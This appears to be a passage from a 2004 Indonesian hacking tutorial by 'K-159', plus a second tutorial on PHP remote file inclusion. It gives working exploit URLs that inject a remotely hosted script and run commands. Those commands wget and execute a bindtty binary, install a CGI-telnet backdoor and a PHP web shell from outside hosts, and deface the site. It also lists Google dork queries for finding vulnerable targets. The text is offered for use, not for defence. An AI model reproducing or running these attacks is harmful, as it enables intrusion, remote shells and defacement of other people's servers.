diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd. 2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi: " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /tmp/httpd " 3.eksekusi file httpd tadi : " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=/tmp/httpd " 4. buka telnet ke IP target sesuai dg port bindttynya II. install Cgi-telnet 1.buat url seperti ini : " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl " url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya. 2. buat cgi-telnet test.pl jadi file eksekusi : " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=chmod 755 /var/www/cgi-bin/test.pl " 3. akses cgitelnet kita dengan membuka url : " http://www.target.com/cgi-bin/test.pl " masukkan passwordnya "n0fr13" III. install shell php 1. buat url seperti ini : "http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://emilroni.port5.com/mail.php -O log.php " url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita. 2. akses shell php kita sesuai dengan foldernya : " http://www.target.com/target/log.php " IV. Deface http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=echo "K-159 and crew was touch your system" > test.html thats all my friends. just try it !!! Denpasar, 15 january 2004 K-159 Epilog :special thx to my beloved sister "May" for all the spirit, motivations, love, kindness, and all the fire that u give to me."I love U my dear sister, in the name of Allah". bacaan lebih lanjut: -------------------- www.geocities.com/emilroni/hackurl.txt www.geocities.com/emilroni/google.txt ======================= ========================================================================================= Title :SUPER KIDDIES HACKING "Super Bugs PHP II" Author :K-159 Greetz :KuNTuA, Lieur-Euy, pe_es. Reference :google.com, membres.lycos.fr, security-corporations.com, security-challenge.com ========================================================================================== Proof of Concept : ================== kesalahan url pada fopen ( ) function sehingga attacker bisa menginjeksikan script ke server target. Target : ======== Temukan target nya di google dengan keyword: 1.allinurl:*.php?page=* 2.allinurl:*.php?content=* 3.allinurl:*.php?file=* 4.allinurl:*.php?filename=* 5.allinurl:*.php?link=* 6.allinurl:*.php?view=* 7.allinurl:*.php?sec=* 8.allinurl:*.php?document=* 9.allinurl:*.php?p=* 10.allinurl:*.php?x=* Exploit: ========= 1.http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt 2.http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt 3.http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt 4.http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt 5.http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt 6.http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt 7.http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt 8.http://www.target.com/target.php?documet=http://www.geocities.com/inul_asoy/_document_._txt 9.http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt 10.http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt Details Exploit: =============== Upload a file : upload file ke server target Explore with fopen() function : mencari target yang mengandung fopen pada server target Execute arbitrary PHP functions : membuat script php ke dalam server target Execute a system() command : menjalankan command unix/linux di server target Manager for SQL Server : mengubah settingan data base sql server target System overviewer (get the root !) : mengintip system server target dan melakukan lokal root Denpasar, 28 February 2004 K-159 bacaan lebih lanjut : ===================== http://www.hackinthebox.org/article.php?sid=6899